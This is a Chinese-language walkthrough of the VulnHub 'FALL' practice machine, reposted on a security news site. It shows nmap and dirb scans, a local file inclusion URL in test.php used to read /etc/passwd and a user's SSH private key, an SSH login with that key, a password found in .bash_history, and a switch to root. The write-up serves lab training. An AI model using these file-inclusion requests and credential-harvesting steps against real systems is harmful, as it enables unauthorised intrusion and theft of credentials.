vulnhub之FALL的实践

admin 2022年6月26日22:20:53安全文章评论8 views733字阅读2分26秒阅读模式

今天实践的是vulnhub的FALL镜像,玩儿vulnhub以来最简单的一个,

下载地址,https://download.vulnhub.com/digitalworld/FALL.7z,

用workstation导入成功,直接能看到IP地址,省的做地址扫描了,

vulnhub之FALL的实践

直接做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.128,

vulnhub之FALL的实践

虽然看到一堆服务,但是最直接的还是通常先浏览器访问http服务,


vulnhub之FALL的实践

发现了个账户,qiu,

继续做目录文件爆破,

sudo dirb http://192.168.58.128 -X .php,.html,.txt,

vulnhub之FALL的实践

浏览器访问http://192.168.58.128/test.php,

vulnhub之FALL的实践

通过报错信息推测这里有文件包含漏洞,

验证一下,http://192.168.58.128/test.php?file=/etc/passwd,

vulnhub之FALL的实践

通过/home/qiu信息,确认qiu是系统用户,

猜测其home下有私钥文件,试试,

http://192.168.58.128/test.php?file=/home/qiu/.ssh/id_rsa,

vulnhub之FALL的实践

把私钥内容拷贝到kali攻击机本地的文件中,vim sshkey,

注意需要手动调整格式,还要给权限,chmod 600 sshkey,

ssh登录,ssh -i sshkey [email protected]

id看一下不是root,需要提权,

ls -la看到有个.bash_history文件,

查看一下发现了qiu的密码remarkablyawesomE,

直接切root,sudo su root,竟然成功了,id确认一下,是root,

vulnhub之FALL的实践


原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之FALL的实践

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月26日22:20:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  vulnhub之FALL的实践 http://cn-sec.com/archives/1145041.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: